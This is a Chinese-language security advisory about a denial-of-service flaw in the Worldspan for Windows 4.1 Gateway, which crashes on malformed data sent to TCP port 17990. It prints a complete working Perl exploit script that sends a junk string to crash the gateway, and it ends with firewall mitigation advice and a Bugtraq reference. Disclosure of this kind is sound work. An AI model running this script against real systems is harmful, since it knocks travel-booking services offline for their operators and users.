|
Worldspan 拒绝服务缺陷
涉及程序:
Worldspan for Windows 4.1 Gateway
描述:
Worldspan 拒绝服务缺陷
详细:
Worldspan 是全球最大的旅游电子商务代理软件生产厂商之一。它支持全球的旅游电子商务信息、代理及 Internet 产品和通讯,其旅游电子商务服务公司遍布全球。
Worldspan 软件被许多旅游电子商务电子商务代理公司,航空公司及大部分旅游电子商务电子商务站点所使用。
它其中的一款软件 Res Manager (Worldspan for Windows 4.1)最近被发现存在严重的拒绝服务漏洞。
运行 Res Manager 的用户是通过 Res Manager 在他们的本地站点连接到网关,然后再通过专线或因特网连接到 Worldspan 。
也就是说网关是位于代理本地站点和 Worldspan 之间的中间系统。
Worldspan 网关通常运行的操作系统是 windows 95 或 98 ,其网关软件的功能是接受代理端的连接,并对数据进行处理后通过专线或因特网发送到 Worldspan 系统。网关系统连接到客户代理端使用的 tcp 端口是 17990 。
问题就是如果客户代理端发送到这个端口的数据非法时,网关系统将会尝试着使用系统所有的资源去处理这个非法数据,导致网关系统的彻底崩溃。在实验中发现典型的崩溃不足一分钟。
攻击方法:
#!/usr/bin/perl
#altomo@digitalgangsters.net
#Worldspan Gateway DoS
$sabre = \"worldspanshouldgoboom\";
use IO::Socket;
$ip = \"$ARGV[0]\";
$port = \"17990\";
if ($#ARGV<0) {
print \" useage: $0 \\n\";
exit();
}
$socket = IO::Socket::INET->new(
Proto=>\"tcp\",
PeerAddr=>$ip,
PeerPort=>$port,);
print \"Worldspan Gateway DoS\\n\";
print \"altomo\\@digitalgangsters.net\\n\";
print \"Wait about a minute, and it should crash.\\n\";
print $socket \"$sabre\\r\";
close $socket;
#nudehackers
解决方案:
应该将这些系统放在防火墙的后面,以阻止来自外部的攻击。但是由于软件本身的原因,它无法阻止任何来自内网(internal)的攻击,厂商在四个月前已经得到了通知,但是目前也还没有很好的解决方案。
附加信息:
无
相关站点:
http://archives.neohapsis.com/archives/bugtraq/2002-07/0048.html
|